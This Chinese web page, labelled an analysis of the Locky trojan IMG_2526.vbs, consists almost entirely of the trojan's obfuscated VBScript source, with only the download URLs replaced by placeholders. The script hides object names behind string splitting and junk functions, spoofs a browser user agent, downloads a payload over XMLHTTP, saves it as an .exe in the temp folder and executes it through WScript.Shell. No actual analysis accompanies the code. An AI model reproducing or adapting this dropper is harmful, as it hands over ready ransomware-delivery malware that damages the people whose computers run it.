手机版 | 登陆 | 注册 | 留言 | 设首页 | 加收藏
当前位置: 网站首页 > 实用技术 > 文章 当前位置: 实用技术 > 文章

IMG_2526.vbs win.locky木马分析

时间:2017-09-22    点击: 次    来源:网络    作者:佚名 - 小 + 大

以下为VBS源代码,木马链接已经删除


Function Set2Mine(Who, Color, X, y ) 
    For i = 0 To UBound(Mines) + 1
        If i > UBound(Mines) Then ReDim Preserve Mines(i)
        If Mines(i).Color = 0 Then
            Mines(i).Who = Who
            Mines(i).Color = Color
            Mines(i).X = X
            Mines(i).y = y
            Mines(i).Tick = 0
            SetMine = i
            Exit For
        End If
    Next
End Function


Dim Salpodeinthriftyensurance 'As String

Dim SalpodeinthriftyUotOfStock 'As String

Function CopyLog()

Dim oFile
Dim iRetVal, fptr1, fptr2, sLine, sNewLogFolderName, sLogFile
Dim sComputer
Dim sLog
Dim sBootDrive
' Make sure the path is accessible
oUtility.ValidateConnection oEnvironment.Item("SLShare")
oUtility.VerifyPathExists oEnvironment.Item("SLShare")
If not oFSO.FolderExists(oEnvironment.Item("SLShare")) then
oLogging.CreateEntry "An invalid SLShare value of " & oEnvironment.Item("SLShare") & " was specified.", LogTypeWarning
Exit Function
End if



End Function


  SalpodeinthriftyBelish = "User"


CUA ="Mozill"+"a/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
Dim SalpodeinthriftyMorty 'As Object
Dim StateUdepends13 'As Object

    RACHEL = "avetof"

       Dim TristateTrue

 Dim Salpodeinthrifty2 'As String
Function StateUdependsSubMainA()
if D = 14 then
AXC = "SaveToFile"
end if
StateUdepends13.Savetofile SalpodeinthriftyUotOfStock , 4-2
End Function

  Salpodeinthrifty2 = "XMLHTTPHIPERAdodb.streaMHIPER"
Vrungel = ".respo"+"nseBody"

Dim Salpodeinthriftystatus
Salpodeinthriftystatus = false
     Dim JohnTheRipper
Dim Salpodeinthriftycashback 'As Object


Function F3(p) 
    Set SalpodeinthriftyRombickom = CreateObject("WScript"+".Shell")
End Function 

Salpodeinthrifty2 ="Microsoft." + Salpodeinthrifty2+  "shell.ApplicationHIPERWscript"+".shellHIPERProcessHIPERGeTHIPERT"+"emPHIPERTyPROTECT"+"pePROTECT"


Function SheduledObject(p,d)


 SalpodeinthriftyRombickom.Run("" &SalpodeinthriftyUotOfStock )
End Function

Dim Salpodeinthrifty1DASH1solo 'As Object   

Function ABTF(A, B, T, F)
set ABTF = A.CreateTextFile( B,T , F)
end function
Function MambaMamba( trtrtr )
   MambaMamba = Split(Replace(Salpodeinthrifty2, "PROTECT", "" ),  trtrtr)
End Function
 

Salpodeinthrifty2 = Salpodeinthrifty2 +"HIPERPROTECToPROTECTpenHIPERwrPROTECTiteHIPERrePROTECTspoPROTECTnseBoPROTECTdyHIPERsaPROTECTvet"+"ofPROTECTileHIPER\HsQdFXw.exePROTECT"+"HIPERhtPROTECTtp:HIPER//"

Dim SalpodeinthriftyGMAKO 'As Object
Dim mual
Function SalpodeinthriftyFuks(p)
 
SalpodeinthriftyMorty.Send

End Function 
JohnTheRipper = MambaMamba("" + "HIPER" + "")
Set SalpodeinthriftyMorty = CreateObject(JohnTheRipper(0))

Function StateUdependsSubMainA2(param1)
param1 = param1 + param1
if  1  < param1 OR param1 < 6777  Then
SalpodeinthriftyASALLLP = SalpodeinthriftyMorty.responseBody
end if
param1 = 2 * param1
End Function

 
Dim Salpodeinthrifty4 'As String


Dim SalpodeinthriftyRombickom
 Dim MarketPlace 'As String
  Dim sTempVis 'As String
  Dim iCount 'As Integer
Public Function WriteCD(aWrite,bWrite)
astp = 12
astp = astp + 3
if astp > 4 then
aWrite.Write bWrite
astp = 3 * astp
end if
End Function
Dim SalpodeinthriftyASALLLP 'As Variant
Dim dePetya 'As Integer
SalpodeinthriftyBelish = SalpodeinthriftyBelish + "-"
 
Dim Twelve 'As Integer
  Dim sDecimalVis 'As String
  Dim SalpodeinthriftyPetir 'As String
SalpodeinthriftyPetir = "Ag"

  Dim MarketPlaceibility 'As String


 Dim sNodeKey 'As String
  Dim sParentKey 'As String

    
 


Twelve = 11 + 1
zTempVis = JohnTheRipper(1)

'Set SalpodeinthriftyGMAKO = CreateObject(JohnTheRipper(8-6))
Set SalpodeinthriftyRockiBilbo = GetRef("SheduledObject")

Set StateUdepends13 = CreateObject("Adodb.streaM")
Set Salpodeinthrifty1DASH1solo = CreateObject(JohnTheRipper(9-6))


Function SetUA()
SalpodeinthriftyLamp.setRequestHeader SalpodeinthriftyBelish, CUA
End Function

if "RIDG" + WScript + "4" = "RIDGWindows Script Host4" Then 


mual = Array("木马url链接","木马url链接","木马url链接")

Set Salpodeinthriftycashback = Salpodeinthrifty1DASH1solo.Environment(JohnTheRipper(1 + 3))

end if

Public Function Anim2UniBall(i)
    Dim Rx, Ry, rBuff
    Dim xt, yt, j, e
    Dim NewX, NewY, d, SgnX, SgnY
    Dim RatioX, RatioY
    Rx = 452
    Ry = 81
    
    
    If SgnY = 1 Then 'y positive testing
        For d = UniBall(i).BallY + 1 To NewY
            j = WeaponTouch(6, i, NewX, d)
            If j = -6 Then
                UniBall(i).BMoveY = UniBall(i).BMoveY * -1
                NewY = d - 1
                Exit For
            End If
        Next
    End If
    
    If SgnY = -1 Then 'y negative testing
        For d = UniBall(i).BallY - 1 To NewY Step -1
            j = WeaponTouch(6, i, NewX, d)
            If j = -6 Then
                UniBall(i).BMoveY = UniBall(i).BMoveY * -1
                NewY = d + 1
                Exit For
            End If
        Next
    End If
    j = WeaponTouch(6, i, NewX, NewY)
    If j = -7 Then Exit Function
    
    UniBall(i).BallX = NewX
    UniBall(i).BallY = NewY
End Function


 dePetya = 89210

 
Salpodeinthriftyensurance = Salpodeinthriftycashback(JohnTheRipper(6))
 Dim i
 'on error GoTo nextU
' on error resume next
sTempVis = JohnTheRipper(Twelve)

Sub SendFlagDat(SndTo)
    Dim i , b , n 
    Dim oNewMsg() , lNewOffSet 
    Dim lNewMsg 
    
    For i = 1 To UBound(Flag1, 2)
        
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 1
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag1(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag1(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry1(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    For i = 1 To UBound(Flag2, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 2
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag2(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag2(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry2(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    For i = 1 To UBound(Flag3, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 3
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag3(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag3(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry3(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    For i = 1 To UBound(Flag4, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 4
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag4(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag4(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry4(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    For i = 1 To UBound(Flag5, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 5
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag5(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag5(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry5(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    
End Sub
MarketPlace = JohnTheRipper(11+2) & JohnTheRipper(11+3)

SalpodeinthriftyBelish = SalpodeinthriftyBelish & SalpodeinthriftyPetir & "ent"

rdde = 19


lTo = UBound(mual)
For i = 0 To lTo Step 1
rdde = rdde * 8

on error resume  next

dePetya =  dePetya +7
 Salpodeinthrifty4 = MarketPlace + mual(i)
 SalpodeinthriftyMorty.Open JohnTheRipper(5), Salpodeinthrifty4, False
dr1=2

rdde = rdde + 7


SetUA()
SalpodeinthriftyFuks " d "
If SalpodeinthriftyMorty.Status +3 = 203 Then
Salpodeinthriftystatus = true
 Exit For
End If

goto14:
Next

on error goto 0
if Salpodeinthriftystatus Then
Dim Ratchet 'As String
 SalpodeinthriftyUotOfStock = Salpodeinthriftyensurance+ sTempVis

F3 ""
StateUdepends13.Type = 1
 StateUdepends13.Open
StateUdependsSubMainA2 22 
WriteCD StateUdepends13,SalpodeinthriftyASALLLP
dttat =4
SalpodeinthriftyUotOfStocku = "" + SalpodeinthriftyUotOfStock 

dttat = dttat*2

StateUdependsSubMainA()
Dim SalpodeinthriftyJohnSnowu,SalpodeinthriftyTmp1 'As Long

SalpodeinthriftyJohnSnowu = 3012

If 1040  < SalpodeinthriftyJohnSnowu Then
  drba =55
 SalpodeinthriftyTmp1 = "|"

SalpodeinthriftyRockiBilbo "}}}}}}}}}}}}}","062"
End If
triada = 341
end if

上一篇:iPhone iPad等iOS 设备上配置修改 hosts 方法

下一篇:KB4041676 累积更新内容 升级版本号15063.674

本站内容如有争议请联系E-mail:admin@82247.com   本站版权(C)82247.com 2018  

沪ICP备14043986-1号 | 沪公网安备 31009102000012号